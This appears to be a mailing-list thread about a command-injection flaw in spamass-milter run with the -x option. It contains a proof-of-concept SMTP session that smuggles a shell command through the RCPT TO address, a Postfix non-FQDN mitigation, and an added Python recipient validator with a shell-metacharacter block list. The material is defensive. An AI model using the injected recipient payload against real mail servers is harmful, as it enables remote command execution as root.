Ned Slider wrote:
Brian wrote:
The key is this:
"If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied recipient (RCPT TO)."
PoC is:
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Easily mitigated; you shouldn't be accepting mail to non-FQDN addresses:
mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address
quit
221 2.0.0 Bye
Connection closed by foreign host.
That's Postfix 2.3.3 on RHEL5 BTW :-)
$ rpm -q postfix
postfix-2.3.3-2.1.el5_2.x86_64
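As an added example (not code from the thread, from spamass-milter or from Postfix), the recipient policy shown above expressed as a small Python check that answers RCPT TO the way the session transcript does. The first rule approximates Postfix's reject_non_fqdn_recipient: an address without a dotted, hostname-shaped domain gets the 504 5.5.2 reply quoted in the thread. The second rule is a defence-in-depth addition of my own: the domain check says nothing about the local part, which is what a milter expands, so local parts containing shell metacharacters are refused as well. The sample recipients, the 550 reply text and the helper names are constructed for this example.

```python
import re

# Constructed sample envelope recipients (not captured from a live server).
SAMPLE_RCPTS = [
    'root+:"|touch /tmp/foo"',   # the non-FQDN recipient shown in the thread
    'user@example.com',          # ordinary fully-qualified address
    'root+tag@example.com',      # plus-addressing with a benign extension
    'user@localhost',            # bare hostname, not fully-qualified
]

# Characters that mean something to /bin/sh. None of them belong in a mailbox
# name that a milter might ever pass to popen()-style expansion.
SHELL_META = set('|&;<>()$`\\"\'*?[]{}~\n')


def is_fqdn(domain):
    """Approximation of Postfix's fully-qualified-domain test: at least two
    labels, each made of hostname-safe characters without a leading or
    trailing hyphen."""
    labels = domain.split('.')
    if len(labels) < 2:
        return False
    for label in labels:
        if not re.fullmatch(r'[A-Za-z0-9-]{1,63}', label):
            return False
        if label.startswith('-') or label.endswith('-'):
            return False
    return True


def check_recipient(rcpt):
    """Return (smtp_code, enhanced_code, text) for a RCPT TO argument.

    Policy 1 mirrors the Postfix reply quoted in the thread (504 5.5.2 for a
    non-FQDN recipient). Policy 2 is an added hardening rule: reject shell
    metacharacters in the local part so a recipient can never reach a shell
    even if a downstream filter expands it. Reply text for policy 2 is
    constructed for this example."""
    rcpt = rcpt.strip()
    if rcpt.startswith('<') and rcpt.endswith('>'):
        rcpt = rcpt[1:-1]
    local, sep, domain = rcpt.rpartition('@')
    if not sep or not is_fqdn(domain):
        return (504, '5.5.2',
                f'<{rcpt}>: Recipient address rejected: need fully-qualified address')
    if any(c in SHELL_META for c in local):
        return (550, '5.1.3',
                f'<{rcpt}>: Recipient address rejected: forbidden characters in local part')
    return (250, '2.1.5', 'Ok')


def check_all(rcpts):
    """Evaluate a list of recipients; returns a list of (rcpt, reply) pairs."""
    return [(r, check_recipient(r)) for r in rcpts]


if __name__ == '__main__':
    for rcpt, (code, enhanced, text) in check_all(SAMPLE_RCPTS):
        print(f'rcpt to: {rcpt}')
        print(f'{code} {enhanced} {text}')
```

Running it prints a reply line per sample recipient in the same shape as the transcript above; only the two fully-qualified addresses with plain local parts receive 250 2.1.5 Ok. The domain test is deliberately a simplification of Postfix's own, which is why the lead-in calls it an approximation.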